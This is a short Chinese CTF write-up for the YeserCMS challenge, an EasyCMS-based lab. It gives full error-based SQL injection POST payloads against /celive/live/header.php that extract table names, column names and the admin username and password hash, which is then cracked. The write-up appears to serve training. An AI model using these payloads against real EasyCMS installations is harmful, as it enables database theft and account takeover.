題目在i春秋ctf大本營

題目的提示並沒有什麽卵用，打開鏈接發現其實是easycms，百度可以查到許多通用漏洞

這裏我利用的是無限報錯註入

訪問url/celive/live/header.php，直接進行報錯註入

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx‘,(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(concat(database())) ),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

繼續POST，拿表

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx‘,(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

這裏出現了一個尷尬的問題，顯示的長度不夠了，通過調整1,32的1來調整，這裏因為裏面的表實在太多了（也不知道大佬們是怎麽精準定位yesercms_user的表的），接著跑一下字段

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx‘,(UpdateXML(1,CONCAT(0x5b,mid((SELECT/**/GROUP_CONCAT(column_name) from information_schema.columns where table_name=‘yesercms_user‘),1,32),0x5d),1)),NULL,NULL,NULL,NULL,NULL,NULL)-- </q></xjxquery>

最後爆用戶密碼：

xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520yesercms_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>

這裏md5的長度也不夠，還是需要調整1,32來查看完整的md5

拿到賬號密碼admin|ff512d4240cbbdeafada404677ccbe61,解密後得到明文：Yeser231

登錄admin賬號來到後臺管理界面，瘋狂的尋找上傳點，發現好像並沒卵用，試著在文件中寫一句話好像也並不能成功，看了wp，才知道在當前模板編輯處存在文件讀取漏洞

“百度杯”CTF比賽 九月場_YeserCMS